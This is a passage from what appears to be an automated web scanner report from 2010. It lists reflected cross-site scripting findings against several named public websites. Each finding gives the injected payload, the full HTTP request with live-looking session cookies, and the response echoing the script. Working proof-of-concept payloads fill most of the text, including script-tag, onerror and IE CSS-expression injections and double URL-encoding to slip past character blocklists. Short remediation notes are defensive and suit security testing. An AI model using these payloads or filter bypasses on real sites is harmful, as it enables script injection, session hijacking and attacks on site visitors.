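The single-encoded payload is caught by the blocklist because the server's decode has already produced the quote; the double-encoded one reaches the filter as %27, passes, and is only turned into a quote by the application's own second decode. The hardened handler needs no blocklist to be safe, because the attribute encoding on output neutralises the quote whichever way it arrives.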

Request

GET /?2f00b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d02eb00d6bf=1 HTTP/1.1
Host: www.avalanchepub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:57:24 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1114343939:73686F702D6A6176613031352E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=GTTfMyMGWWvFGL5lvP1q13vcWfhXMbqLwLJQ4nj4pfy6VvLDx5Wgn5TSn7fw52RNJJ7V60vmL4W1pnFV6ShJ95QX1hcG3SzVpF3P4hHymRlNQ35LpTT3ljhGGnddcJMw!1743587914; path=/
Set-Cookie: NLVisitorId=rnoX2rlXAYfybmPd; domain=.avalanchepub.com; expires=Friday, 11-Nov-2011 17:57:24 GMT; path=/
Set-Cookie: NLShopperId2=rnoX2rlXAY3ybt50; domain=.avalanchepub.com; expires=Saturday, 27-Nov-2010 17:57:24 GMT; path=/
Set-Cookie: NS_VER=2010.2.0; domain=www.avalanchepub.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=983
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 34834


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Homepage - AVALANCHE</title>


<meta name="robots" content="NOODP,NOYDIR">
<script language='JavaScrip
...[SNIP]...
<input type='hidden' name='referer' value='http://www.avalanchepub.com/?2f00b%27style%3d%27x%3aexpression%28alert%281%29%29%27d02eb00d6bf=1&2f00b'style='x:expression(alert(1))'d02eb00d6bf=1'>
...[SNIP]...

2.145. http://www.dcgla.com/includes/testimonial.php [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dcgla.com
Path:   /includes/testimonial.php

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 976ff"><script>alert(1)</script>da45883e2da was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/testimonial.php?id=dtb976ff"><script>alert(1)</script>da45883e2da HTTP/1.1
Host: www.dcgla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=245246864.1290271625.1.1.utmcsr=ask|utmccn=(organic)|utmcmd=organic|utmctr=los%20angeles%20it%20consulting; ClickAndChat.com=109-1290271668886; __utma=245246864.1301270426.1290271625.1290271625.1290271625.1; __utmc=245246864; __utmb=245246864.4.10.1290271625;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Nov 2010 17:16:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-type: text/html

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Dependable Computer Guys</title>
<LINK REL=StyleSheet HREF="../style.css" TITLE="DCGStyle" TYPE="text/
...[SNIP]...
<img src="../images/testimonial_dtb976ff"><script>alert(1)</script>da45883e2da.gif" border="0" usemap="#tmap">
...[SNIP]...

2.146. http://www.dcgla.com/includes/testimonial.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dcgla.com
Path:   /includes/testimonial.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e32d"><script>alert(1)</script>8b1a40d7583 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/testimonial.php?id=cityse/2e32d"><script>alert(1)</script>8b1a40d7583arch HTTP/1.1
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.dcgla.com
Cookie: __utma=245246864.1301270426.1290271625.1290271625.1290271625.1; __utmb=245246864.3.10.1290271625; __utmc=245246864; __utmz=245246864.1290271625.1.1.utmcsr=ask|utmccn=(organic)|utmcmd=organic|utmctr=los%20angeles%20it%20consulting; ClickAndChat.com=109-1290271668886

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Nov 2010 17:16:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-type: text/html

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Dependable Computer Guys</title>
<LINK REL=StyleSheet HREF="../style.css" TITLE="DCGStyle" TYPE="text/
...[SNIP]...
<img src="../images/testimonial_cityse/2e32d"><script>alert(1)</script>8b1a40d7583arch.gif" border="0" usemap="#tmap">
...[SNIP]...

2.147. http://www.directpointe.com/support/esupport_login.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.directpointe.com
Path:   /support/esupport_login.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc6ba"><script>alert(1)</script>9eb03b16144 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /support/esupport_login.aspx?dc6ba"><script>alert(1)</script>9eb03b16144=1 HTTP/1.1
Host: www.directpointe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Nov 2010 17:16:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25395


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Copyright .... 2000-2010 DirectPointe Inc.
All rights reserved. All
...[SNIP]...
<input type="hidden" name="errorURL" value="http://www.directpointe.com/support/esupport_login.aspx?dc6ba"><script>alert(1)</script>9eb03b16144=1" />
...[SNIP]...

2.148. http://www.lang.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lang.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ec76c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279dd576fad79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ec76c'style='x:expression(alert(1))'9dd576fad79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers: IE8 and later disable CSS expressions in standards mode, although, as with 2.144, the response below carries no DOCTYPE and is therefore rendered in quirks mode, where expressions remain enabled. The underlying defect, an unescaped single quote reflected into a single-quoted attribute value, does not depend on the browser.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /?ec76c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279dd576fad79=1 HTTP/1.1
Host: www.lang.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:58:02 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1114439413:73686F702D6A6176613030332E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=MNZBMyMKys1npvWM35GnBMSwFw9BFmx3HjChJvjBND19vT21VTM9x3CvKGSXhHxj6dfzbtvp5mvrtzyvDnRwzTvqYGhM1CMQtYs9QhSGNGJhp3k2QLyfSR6QnQJGNhpn!-991854023; path=/
Set-Cookie: NLVisitorId=rnoX2rlXATOHb8rE; domain=.lang.com; expires=Friday, 11-Nov-2011 17:58:03 GMT; path=/
Set-Cookie: NLShopperId=rnoX2rlXATaHbzKG; domain=.lang.com; expires=Saturday, 27-Nov-2010 17:58:03 GMT; path=/
Set-Cookie: NS_VER=2010.2.0; domain=www.lang.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=885
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 41318


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wall Calendars, Monthly Planners, Decorative Stationery & Gifts by LANG</title>


<meta name="robots" content=
...[SNIP]...
<input type='hidden' name='referer' value='http://www.lang.com/?ec76c%27style%3d%27x%3aexpression%28alert%281%29%29%279dd576fad79=1&ec76c'style='x:expression(alert(1))'9dd576fad79=1'>
...[SNIP]...

2.149. http://www.makeitwork.com/about/press-releases [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.makeitwork.com
Path:   /about/press-releases

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4d65%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3048996d15f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f4d65"><script>alert(1)</script>3048996d15f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /about/press-releases?f4d65%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3048996d15f=1 HTTP/1.1
Host: www.makeitwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=246358936.1290271612.1.1.utmgclid=CNTcksnsr6UCFRhg2godlBHrYA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; 8402d15662a4628733f3ad434ce06140=2na2t369v9umvdqdqv92diae06; __utma=246358936.1337497436.1290271612.1290271612.1290271612.1; __utmc=246358936; __utmb=246358936.1.10.1290271612;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:20:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 20 Nov 2010 17:20:01 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<link href="/about/press-releases?f4d65"><script>alert(1)</script>3048996d15f=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.150. http://www.makeitwork.com/plugins/system/rokbox/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.makeitwork.com
Path:   /plugins/system/rokbox/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f614c%2527%253balert%25281%2529%252f%252fc73f4c1f2ed was submitted in the REST URL parameter 3. This input was echoed as f614c';alert(1)//c73f4c1f2ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to terminate the JavaScript string into which the data is copied. Two details visible in the response below mean that this exact payload would not execute, however: the reflected value is word-capitalised (Rokboxf614c';Alert(1)//C73f4c1f2ed), so Alert does not name the alert function, and the string sits inside if('...'), so the injected semicolon leaves the if( unclosed and the whole script block fails to parse. Treat the finding as confirmed string termination in a script context and verify a working payload manually, taking the case transformation and the enclosing expression into account.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /plugins/system/rokboxf614c%2527%253balert%25281%2529%252f%252fc73f4c1f2ed/ HTTP/1.1
Host: www.makeitwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=246358936.1290271612.1.1.utmgclid=CNTcksnsr6UCFRhg2godlBHrYA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; 8402d15662a4628733f3ad434ce06140=2na2t369v9umvdqdqv92diae06; __utma=246358936.1337497436.1290271612.1290271612.1290271612.1; __utmc=246358936; __utmb=246358936.1.10.1290271612;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:20:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 62493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...
           'height'            : 650,
//            'scrolling'            : 'no'
//        });
//        
//        $("#embed").click(function(){
//            $(this).focus().select();
//            //clip.setText($(this).val());
//            return false;
//        });

       if('Rokboxf614c';Alert(1)//C73f4c1f2ed') {
           var pattern = /Rokboxf614c';Alert(1)//C73f4c1f2ed/i;
           $(".services_header").filter(function(){
               var string = $(this).text();
               var found = pattern.test(string);
               if(found) {
                   $("d
...[SNIP]...

2.151. http://www.makeitwork.com/plugins/system/rokbox/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.makeitwork.com
Path:   /plugins/system/rokbox/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a42c5%253balert%25281%2529%252f%252fa87db967c5e was submitted in the REST URL parameter 3. This input was echoed as a42c5;alert(1)//a87db967c5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /plugins/system/rokboxa42c5%253balert%25281%2529%252f%252fa87db967c5e/ HTTP/1.1
Host: www.makeitwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=246358936.1290271612.1.1.utmgclid=CNTcksnsr6UCFRhg2godlBHrYA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; 8402d15662a4628733f3ad434ce06140=2na2t369v9umvdqdqv92diae06; __utma=246358936.1337497436.1290271612.1290271612.1290271612.1; __utmc=246358936; __utmb=246358936.1.10.1290271612;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:20:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 62664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...
/        
//        $("#embed").click(function(){
//            $(this).focus().select();
//            //clip.setText($(this).val());
//            return false;
//        });

       if('Rokboxa42c5;Alert(1)//A87db967c5e') {
           var pattern = /Rokboxa42c5;Alert(1)//A87db967c5e/i;
           $(".services_header").filter(function(){
               var string = $(this).text();
               var found = pattern.test(string);
               if(found) {
                   $("div[id^=m_], div[id^=s_]").css('display', 'none');
                   re
...[SNIP]...

2.152. http://www.makeitwork.com/plugins/system/rokbox/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.makeitwork.com
Path:   /plugins/system/rokbox/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload d26ef%253c%252ftitle%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ed4c62d3506a was submitted in the REST URL parameter 3. This input was echoed as d26ef</title><img src=a onerror=alert(1)>d4c62d3506a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /plugins/system/rokboxd26ef%253c%252ftitle%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ed4c62d3506a/ HTTP/1.1
Host: www.makeitwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=246358936.1290271612.1.1.utmgclid=CNTcksnsr6UCFRhg2godlBHrYA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; 8402d15662a4628733f3ad434ce06140=2na2t369v9umvdqdqv92diae06; __utma=246358936.1337497436.1290271612.1290271612.1290271612.1; __utmc=246358936; __utmb=246358936.1.10.1290271612;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:20:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 62636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...
<title>Rokboxd26ef</Title><Img Src=A Onerror=Alert(1)>D4c62d3506a System, PLUGINS. Make It Work guarantees you will be delighted!</title>
...[SNIP]...

2.153. http://www.makeitwork.com/plugins/system/rokbox/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.makeitwork.com
Path:   /plugins/system/rokbox/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 708b3"><img%20src%3da%20onerror%3dalert(1)>59fe09ce6a was submitted in the REST URL parameter 3. This input was echoed as 708b3"><img src=a onerror=alert(1)>59fe09ce6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /plugins/system/rokbox708b3"><img%20src%3da%20onerror%3dalert(1)>59fe09ce6a/ HTTP/1.1
Host: www.makeitwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=246358936.1290271612.1.1.utmgclid=CNTcksnsr6UCFRhg2godlBHrYA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; 8402d15662a4628733f3ad434ce06140=2na2t369v9umvdqdqv92diae06; __utma=246358936.1337497436.1290271612.1290271612.1290271612.1; __utmc=246358936; __utmb=246358936.1.10.1290271612;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:20:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 62683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...
<meta name="keywords" content="Make It Work provides the best Rokbox708b3"><Img Src=A Onerror=Alert(1)>59fe09ce6a services in System, PLUGINS. We guarantee you will be delighted! Call 877-625-3489." />
...[SNIP]...

2.154. http://www.makeitwork.com/plugins/system/rokbox/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.makeitwork.com
Path:   /plugins/system/rokbox/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 93329<img%20src%3da%20onerror%3dalert(1)>230708c6484 was submitted in the REST URL parameter 3. This input was echoed as 93329<img src=a onerror=alert(1)>230708c6484 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /plugins/system/rokbox93329<img%20src%3da%20onerror%3dalert(1)>230708c6484/ HTTP/1.1
Host: www.makeitwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=246358936.1290271612.1.1.utmgclid=CNTcksnsr6UCFRhg2godlBHrYA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; 8402d15662a4628733f3ad434ce06140=2na2t369v9umvdqdqv92diae06; __utma=246358936.1337497436.1290271612.1290271612.1290271612.1; __utmc=246358936; __utmb=246358936.1.10.1290271612;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:20:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 62454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...
<h1 class="title">Rokbox93329<Img Src=A Onerror=Alert(1)>230708c6484 Services in System, PLUGINS:</h1>
...[SNIP]...

2.155. http://www.mapquest.com/maps/map.adp [country parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mapquest.com
Path:   /maps/map.adp

Issue detail

The value of the country request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28087</script><script>alert(1)</script>e99a017790b was submitted in the country parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /maps/map.adp?searchtype=address&country=28087</script><script>alert(1)</script>e99a017790b HTTP/1.1
Host: www.mapquest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/
Set-Cookie: tsession=hyPAPBbXpqCCJFqQoNaz/ue5K9M=; Domain=mapquest.com; Expires=Sat, 20-Nov-2010 18:32:40 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Sat, 20-Nov-2010 18:17:40 GMT; Path=/
Set-Cookie: psession=jnQDDuTHOg9IX67PkdpU2BI35pg=; Domain=mapquest.com; Expires=Fri, 18-Feb-2011 18:02:40 GMT; Path=/
Set-Cookie: c_Id=MjIwOjM2OQ%3D%3D; Expires=Sat, 20-Nov-2010 18:32:40 GMT; Path=/
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Sat, 20 Nov 2010 18:02:40 GMT
Content-Length: 29780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xml:lang="en" c
...[SNIP]...
tegories":null,"charFilter":null,"displayQuery":null,"inflectionPointIndex":null,"latch":false,"latchQuery":null,"locale":"en","mapState":null,"mostPopularCategory":null,"page":0,"position":0,"query":"28087</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>E99A017790B","routeContext":null,"routeSessionId":null,"searchAroundLocation":null,"searchTerm":null,"searchType":"onMap","shapePoints":null,"showDetails":false,"sortType":"relevance","total":0},"name":null,"note
...[SNIP]...

2.156. http://www.turnerlicensing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 616be%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527018d474a113 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 616be'style='x:expression(alert(1))'018d474a113 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /?616be%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527018d474a113=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId3=rnoX2q9XAatYKaJC; JSESSIONID=5FGwMyBPj2G9W1Yp7Zy2vGPjsmpGvTRLK5dLCcGL1LQd27JDFJ2hjzvGZJdq31s19kkgnxsBqmQQqJp7C24sztLlX2QJNz6JFx0xSDXrxwjDszkrLTjK3L22n5n1bXhG!-639703385; NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290272830.1290272924.6; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=1.1.10.1290272924
Host: www.turnerlicensing.com

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:26 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 328662000:73686F702D6A6176613034302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=VJtCMyKpYCsTv7gJCDNfCpFYc2fkfz1c7ycNT5yyhpcxp2g3L0JTnvLKZ1B0pF2vjyz7TWkwwv9ZMnNMMjJhTyg6JTsGpRqwWrFRt7zybbF3Hwppyp1FMzmhKmhQKppz!-639703385; path=/
